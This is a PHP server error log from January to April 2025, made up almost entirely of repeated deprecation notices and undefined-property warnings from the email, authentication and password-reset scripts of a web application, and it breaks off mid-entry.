PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:58:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:58:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:59:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:59:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 01:00:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:03:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:09:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:23:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:23:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:47:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:59:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 03:08:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 03:29:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:29:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:32:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:33:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:34:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 04:21:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 04:52:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:30:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:31:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:46:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:53:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 06:08:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 06:26:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 07:24:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 09:28:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 09:31:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 13:41:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 13:51:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 16:27:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 20:52:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 23:59:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 01:01:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 01:20:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 02:12:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 02:12:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [29-Jan-2025 02:56:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:31:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:59:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 04:46:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 04:48:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 05:30:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 05:32:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 06:55:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:14:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:29:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:35:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 01:09:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 02:40:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 03:38:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 03:58:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 04:04:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 04:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 01:06:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 02:15:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 04:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Feb-2025 13:52:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Feb-2025 00:40:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Feb-2025 01:33:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Feb-2025 01:18:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 03:15:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 04:25:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 04:31:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 09:16:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Feb-2025 05:22:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 21:36:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 22:32:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 23:57:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Feb-2025 00:39:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Feb-2025 02:42:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 04:26:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 05:33:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 05:33:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 06:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 07:12:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 12:10:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Feb-2025 03:36:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Feb-2025 08:02:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 00:14:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 00:43:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 11:42:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 23:12:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Feb-2025 00:59:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Feb-2025 11:49:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Feb-2025 05:24:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Feb-2025 06:48:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Feb-2025 06:02:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Feb-2025 06:02:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Mar-2025 21:47:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Mar-2025 22:01:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Mar-2025 00:52:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Mar-2025 01:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Mar-2025 17:19:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Mar-2025 21:46:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 00:21:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 04:31:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 05:43:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 22:36:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Mar-2025 01:10:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Mar-2025 01:48:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 05:27:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 06:13:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 06:16:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:37:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:38:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:50:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 08:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 08:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Mar-2025 15:57:50 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [23-Mar-2025 10:19:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 11:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 14:12:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 23:58:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:22:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:23:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:25:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:52:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 08:03:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Mar-2025 04:40:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:20:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:36:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:37:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:08:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:13:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:15:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:15:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:01:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:24:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:25:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:26:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 04:42:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:41:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:44:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:47:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 01:05:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 02:06:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 03:58:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Mar-2025 01:23:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Mar-2025 02:11:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Mar-2025 12:40:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Apr-2025 02:27:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Apr-2025 20:22:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Apr-2025 23:33:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Apr-2025 23:23:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Apr-2025 23:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 00:14:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 00:54:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 01:24:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 02:34:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 05:09:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 08:53:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 14:04:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 05:47:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 12:24:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 12:26:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 12:27:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 12:28:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 22:48:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 22:49:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 22:50:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:16:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 02:19:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 06:25:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 07:03:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 11:37:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 12:45:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 12:47:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 22:25:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 22:57:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:57:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:57:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:58:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 23:25:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:10:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:11:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:17:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:32:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 00:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:12:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:31:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:38:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:44:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:03:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:19:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:59:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:30:19 UTC] PHP Warning: 